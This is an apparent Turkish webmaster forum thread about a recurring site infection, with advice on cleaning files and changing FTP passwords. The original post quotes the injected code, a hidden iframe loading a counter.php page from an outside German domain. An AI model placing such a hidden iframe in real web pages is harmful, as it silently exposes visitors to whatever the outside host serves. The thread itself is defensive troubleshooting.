Siteye Musallat Olan Virüs
-
yaptığım bikaç sitede sürekli virüs uyarısı var diye arıyorlar. ve hep aynı virüsler nasıl bulaşıyor nerede açık var bilmiyorum.
bu virüs ne yoluyla bulaşıyor bi bilgisi olan varmı ?
Virüs ;
<iframe src="http://rheinsport.de/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
-
Tek dosyada yoktur,ftp'yi komple temizlemen lazım.
-
virüs değil kullandığın bir sayaç varsa site için reklamını yapıyor siteye
-
erc bunu yazdı
sayaç yok sadece google kodları var
-
erc bunu yazdı
O ihtimalde olabilir linke hiç bakmadım mürid virüs dedi diye.
Belki counter diye özellikle yazmışta olabilir,analiz yapacak durumda değilim şuan,virüs olduğundan kesin eminsen ftp'yi komple ara birçok kopyasını bulursun hocam.
-
pcdoktor636 bunu yazdıerc bunu yazdı
O ihtimalde olabilir linke hiç bakmadım mürid virüs dedi diye.
Belki counter diye özellikle yazmışta olabilir,analiz yapacak durumda değilim şuan,virüs olduğundan kesin eminsen ftp'yi komple ara birçok kopyasını bulursun hocam.
ben herhangi bi uyarı almadım ama diğer pc de avast var uyarı verdi, internetten virustotal tarzı sitelerde tarama yaptım virüs çıkmadı ama birinde yukarıdakini buldu onu temizleyince temiz gösterdi ve pc uyarı vermedi.
ama bi süre sonra tekrar bulaşıyor -
Kullandığın yazılım ne? js dosyalarına bak birde verdiğin kod varmı
-
kullandığın bir eklentiden kaynaklı da olabilir hit almak için her boku yapıyorlar,tüm dosyalara tek tek bakmak gerek şimdi :(
-
iframe virüsü olabilir, kullandığın ftp programıyla alakalı yada pc ile, crackli kullanıyorsan ftp programını olma ihtimali muhtemel, ben 3 sene önce falan uğraşmıştım o zamanlar cuteftp kullanıyordum, o günden beri filezilla kullanıyorum hiç sıkıntı yok, 3 sene geçmesine ragmen bu virüs etkin piyasada, eğerki iframe virüsü ise temizlemen zaman alabilir, tüm index dosyalarına bulaşmıştır, ya hepsini teker teker temizleyeceksin temiz bir pc ve ftp programıyla yada tamamen dosyaları silip yeniden yükleyeceksin yedeği varsa.
-
virüsleri silip ftp şifrelerini değiştirdim umarım sorun çözülür... teşekkürler
-
Ftp şifresini değiştirip filezilla kullan.